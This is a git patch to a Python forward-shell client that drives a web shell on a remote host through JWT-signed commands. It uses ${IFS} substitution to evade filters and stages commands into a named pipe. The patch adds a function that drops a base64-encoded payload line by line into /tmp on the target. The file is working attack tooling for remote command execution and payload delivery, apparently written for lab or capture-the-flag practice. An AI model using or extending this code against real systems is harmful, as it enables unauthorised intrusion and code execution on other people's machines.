From f5e656c74e9f2e5602fcdf63cb068e2545f0066f Mon Sep 17 00:00:00 2001
From: Isaac Parenteau <locus2k@gmail.com>
Date: Fri, 4 Mar 2022 21:22:13 -0500
Subject: [PATCH] Added option to send a base64 payload

---
 forward_shell.py | 35 ++++++++++++++++++++++++++++-------
 1 file changed, 28 insertions(+), 7 deletions(-)

diff --git a/forward_shell.py b/forward_shell.py
index 78a455e..4ecc503 100644
--- a/forward_shell.py
+++ b/forward_shell.py
@@ -12,6 +12,8 @@ import time
 import jwt
 
 
+PAYLOAD = """Base64 Payload goes here"""
+
 class WebShell(object):
 
     def __init__(self, remote_host='http://172.16.1.22', remote_port=3000,
@@ -55,15 +57,15 @@ class WebShell(object):
                 self.run_raw_command(clear_output)
             time.sleep(self.interval)
 
-    def run_raw_command(self, cmd, timeout=50, space_delimiter='${IFS}'):
+    def run_raw_command(self, command, timeout=50, space_delimiter='${IFS}'):
         """
 
-        :param cmd:
+        :param command:
         :param timeout:
         :param space_delimiter:
         :return:
         """
-        payload = {'cmd': cmd.replace(' ', space_delimiter)}
+        payload = {'cmd': command.replace(' ', space_delimiter)}
         token = jwt.encode(payload, self.key, algorithm='HS256')
         headers = {'Authorization': f'Bearer {token.decode()}'}
 
@@ -73,15 +75,16 @@ class WebShell(object):
         except:
             pass
 
-    def write_command(self, cmd):
+    def write_command(self, command, timeout=50):
         """
 
-        :param cmd:
+        :param timeout:
+        :param command:
         :return:
         """
-        b64cmd = base64.b64encode('{}\n'.format(cmd.rstrip()).encode('utf-8')).decode('utf-8')
+        b64cmd = base64.b64encode('{}\n'.format(command.rstrip()).encode('utf-8')).decode('utf-8')
         stage_cmd = f'echo {b64cmd} | base64 -d>{self.stdin}'
-        self.run_raw_command(stage_cmd)
+        self.run_raw_command(stage_cmd, timeout)
         time.sleep(self.interval * 1.1)
 
     def upgrade_shell(self):
@@ -93,6 +96,22 @@ class WebShell(object):
         print(upgrade_shell)
         self.write_command(upgrade_shell)
 
+    def send_payload(self):
+        """
+
+        :return:
+        """
+        print('Sending payload')
+        payloads = PAYLOAD.splitlines()
+
+        payload_cmd = f'cd /tmp && echo {payloads.pop(0)} > myFile.txt'
+        self.write_command(payload_cmd, timeout=30)
+        for p in payloads:
+            payload_cmd = f'cd /tmp && echo {p} >> myFile.txt'
+            self.write_command(payload_cmd, timeout=30)
+
+        print('Done Sending Payload')
+
 
 prompt = "Please Subscribe> "
 s = WebShell()
@@ -101,5 +120,7 @@ while True:
     if cmd == "upgrade":
         prompt = ""
         s.upgrade_shell()
+    elif cmd == "payload":
+        s.send_payload()
     else:
         s.write_command(cmd)